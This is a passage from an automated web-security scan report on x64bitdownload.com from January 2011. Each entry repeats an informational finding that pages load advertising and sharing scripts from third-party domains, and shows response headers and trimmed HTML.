Path:	/64-bit-killfile-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.43. http://www.x64bitdownload.com/64-bit-mp3-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.44. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.45. http://www.x64bitdownload.com/64-bit-multipart-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.46. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.47. http://www.x64bitdownload.com/64-bit-news-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.48. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.49. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.50. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.51. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.52. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.53. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.54. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.55. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.56. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.57. http://www.x64bitdownload.com/64-bit-nntp-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87718

